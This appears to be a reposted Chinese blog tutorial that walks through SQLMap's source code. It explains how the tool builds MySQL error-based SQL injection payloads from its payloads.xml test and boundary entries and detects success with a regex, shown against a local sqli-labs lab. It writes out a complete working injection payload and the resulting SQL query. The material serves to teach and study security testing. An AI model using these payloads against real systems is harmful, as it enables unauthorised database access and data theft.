Python：SQLMap源碼精讀—基于錯誤的盲注（error-basedblind）

2019-11-14 17:40:32

字體：大中小

來源：轉載

供稿：網友

目標網址

http://127.0.0.1/shentou/sqli-labs-master/Less-5/?id=1

Payload的生成

 1 <test> 2     <title>MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause</title> 3     <stype>2</stype> 4     <level>1</level> 5     <risk>0</risk> 6     <clause>1</clause> 7     <where>1</where> 8     <vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</vector> 9     <request>10         <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>11     </request>12     <response>13         <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>14     </response>15     <details>16         <dbms>MySQL</dbms>17         <dbms_version>&gt;= 5.0</dbms_version>18     </details>19 </test>

該test xml元素是從文件payloads.xml提取出來的。

sqlmap會實現讀取payloads.xml文件中的test元素，然后循環遍歷，并生成相應的payload進行測試。

以上面的test為例，當遍歷到該test的時候，在其子循環當中，還需要依次遍歷boundary元素（都在payloads.xml文件中），并找到一個匹配的boundary。

何為匹配？

注意上面的test元素的子節點：where=1 和 clause=1

當且僅當某個boundary元素的where節點的值包含test元素的子節點，clause節點的值包含test元素的子節點的時候，該boundary才能和當前的test匹配，從而進一步生成payload。

例如：

1 <boundary>2     <level>1</level>3     <clause>1</clause>4     <where>1,2</where>5     <ptype>2</ptype>6     <PRefix>'</prefix>7     <suffix>AND '[RANDSTR]'='[RANDSTR]</suffix>8 </boundary>

該boundary元素中的where節點的值為1,2，含有test元素的where節點的值（1）

并且，boundary元素中的clause節點的值為1，含有test元素的where節點的值（1）

因此，該boundary和test元素可以匹配。

test元素的payload的值為：

AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

最終的payload是根據test的payload子節點和boundary的prefix（前綴）、suffix（后綴）子節點的值組合而成的，即：

最終的payload = url參數 + boundary.prefix+test.payload+boundary.suffix

將其中的[RANDNUM]、[DELIMITER_START]、[DELIMITER_STOP]替換掉之后

則生成的payload類似如下：

Payload: id=1' AND (SELECT 1497 FROM(SELECT COUNT(*),CONCAT(CHAR(58,101,121,111,58),(SELECT (CASE WHEN (1497=1497) THEN 1 ELSE 0 END)),CHAR(58,97,98,104,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'pujM'='pujM

其中：

URL參數：id=1
prefix：'
payload：AND (SELECT 1497 FROM(SELECT COUNT(*),CONCAT(CHAR(58,101,121,111,58),(SELECT (CASE WHEN (1497=1497) THEN 1 ELSE 0 END)),CHAR(58,97,98,104,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
suffix：AND 'pujM'='pujM

最終生成的mysql語句為：

SELECT    *FROM    usersWHERE    id = '1'AND (    SELECT        1497    FROM        (            SELECT                COUNT(*),                CONCAT(                    CHAR (58, 101, 121, 111, 58),                    (                        SELECT                            (                                CASE                                WHEN (1497 = 1497) THEN                                    1                                ELSE                                    0                                END                            )                    ),                    CHAR (58, 97, 98, 104, 58),                    FLOOR(RAND(0) * 2)                ) x            FROM                information_schema. TABLES            GROUP BY                x        ) a)AND 'pujM' = 'pujM'

如果，url：http://127.0.0.1/shentou/sqli-labs-master/Less-5/?id=1可注入的話，那么執行的時候就會報如下錯誤：

Duplicate entry ':eyo:1:abh:1' for key 'group_key'

源碼解釋

 1 # In case of error-based SQL injection 2 elif method == PAYLOAD.METHOD.GREP: 3     # Perform the test's request and grep the response 4     # body for the test's <grep> regular expression 5     try: 6         page, headers = Request.queryPage(reqPayload, place, content=True, raise404=False) 7         output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) / 8                 or extractRegexResult(check, listToStrValue(headers.headers / 9                 if headers else None), re.DOTALL | re.IGNORECASE) /10                 or extractRegexResult(check, threadData.lastRedirectMsg[1] /11                 if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == /12                 threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)13 14         if output:15             result = output == "1"16             if result:17                 infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)18                 logger.info(infoMsg)19 20                 injectable = True21 22     except sqlmapConnectionException, msg:23         debugMsg  = "problem occured most likely because the "24         debugMsg += "server hasn't recovered as expected from the "25         debugMsg += "error-based payload used ('%s')" % msg26         logger.debug(debugMsg)

將最終的payload傳遞給Request.queryPage函數執行并返回最終的執行結果page

test元素的grep子節點的值是一個正則表達式：<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>

由前面的數據，我們知道

[DELIMITER_START]=:eyo:

[DELIMITER_STOP] =:abh:

則最終生成的正則表達式為：:eyo:(?P<result>.*?):abh:(每次生成都是不一樣的，因為:eyo:和:abh:都是隨機生成的)

將page和正則表達式傳遞給函數extractRegexResult

 1 def extractRegexResult(regex, content, flags=0): 2     """ 3     Returns 'result' group value from a possible match with regex on a given  4     content 5     """ 6  7     retVal = None 8  9     if regex and content and '?P<result>' in regex:10         match = getCompiledRegex(regex, flags).search(content)11 12         if match:13             retVal = match.group("result")14 15     return retVal

函數功能較簡單，主要使用正則表達式判斷是否包含指定的數據，如果有，則返回匹配的數據，沒有，則返回None。

由前面的內容，可知，如果url可以注入的話，返回值retVal應該等于"1"

if output:    result = output == "1"    if result:        infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)        logger.info(infoMsg)        injectable = True

而使用正則：:eyo:(?P<result>.*?):abh:來匹配Duplicate entry ':eyo:1:abh:1' for key 'group_key'的結果為：1

故，url：http://127.0.0.1/shentou/sqli-labs-master/Less-5/?id=1可注入